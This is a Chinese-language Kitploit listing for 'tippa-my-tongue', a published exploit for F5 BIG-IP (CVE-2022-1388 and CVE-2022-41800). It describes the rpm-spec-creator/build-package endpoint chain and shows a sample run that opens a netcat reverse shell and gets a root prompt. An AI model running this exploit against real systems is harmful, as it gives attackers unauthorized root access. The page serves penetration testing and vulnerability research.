Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
tippa-my-tongue — 使用 CVE-2022-1388 和 CVE-2022-41800 的 F5 BIG-IP 漏洞利用 | Kitploit
工具/GitHubGitHub/j-baines/tippa-my-tongue
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubj-baines/tippa-my-tongue

tippa-my-tongue

使用 CVE-2022-1388 和 CVE-2022-41800 的 F5 BIG-IP 漏洞利用

查看仓库
1403年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

Tippa My Tongue

Tippa My Tongue 是一个利用 CVE-2022-1388 和 CVE-2022-41800 在 F5 BIG-IP 产品上建立 root 反向 Shell 的漏洞利用工具。大多数 CVE-2022-1388 利用工具通过 /mgmt/tm/util/bash 实现代码执行。然而,本工具使用了 /mgmt/shared/iapp/rpm-spec-creator,随后再使用 /mgmt/shared/iapp/build-package。这一方法最早由 Ron Bowes 在 AttackerKB 的这篇 分析文章 中提出。不过,据我所知,之前从未有人发布过只采用这种方式的 CVE-2022-1388 漏洞利用工具。

更多详情请阅读 VulnCheck 的博文。

使用示例:

albinolobster@mournland:~/tippa-my-tongue$ python3 tippa-my-tongue.py --rhost 10.9.49.191 --lhost 10.9.49.194

   ▄▄▄▄▄▪   ▄▄▄· ▄▄▄· ▄▄▄·     • ▌ ▄ ·.  ▄· ▄
   •██  ██ ▐█ ▄█▐█ ▄█▐█ ▀█     ·██ ▐███▪▐█▪██
    ▐█.▪▐█· ██▀· ██▀·▄█▀▀█     ▐█ ▌▐▌▐█·▐█▌▐█▪
    ▐█▌·▐█▌▐█▪·•▐█▪·•▐█ ▪▐▌    ██ ██▌▐█▌ ▐█▀·.
    ▀▀▀ ▀▀▀.▀   .▀    ▀  ▀     ▀▀  █▪▀▀▀  ▀ •
         ▄▄▄▄▄       ▐ ▄  ▄▄ • ▄• ▄▌▄▄▄ .
         •██  ▪     •█▌▐█▐█ ▀ ▪█▪██▌▀▄.▀·
          ▐█.▪ ▄█▀▄ ▐█▐▐▌▄█ ▀█▄█▌▐█▌▐▀▀▪▄
          ▐█▌·▐█▌.▐▌██▐█▌▐█▄▪▐█▐█▄█▌▐█▄▄▌
          ▀▀▀  ▀█▄▀▪▀▀ █▪·▀▀▀▀  ▀▀▀  ▀▀▀

                 CVE-2022-1388
                 CVE-2022-41800

                       🦞

[+] Executing netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Sending initial request to rpm-spec-creator
[+] Sending exploit attempt request to build-package
Connection received on 10.9.49.191 47152
bash: no job control in this shell
[@localhost:NO LICENSE:Standalone] BUILD # pwd
pwd
/var/config/rest/node/tmp/BUILD
[@localhost:NO LICENSE:Standalone] BUILD # id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[@localhost:NO LICENSE:Standalone] BUILD #

致谢

  • Ron Bowes:感谢他发现这些端点并分享给全世界
  • RHCP:感谢他们的放克音乐
下载工具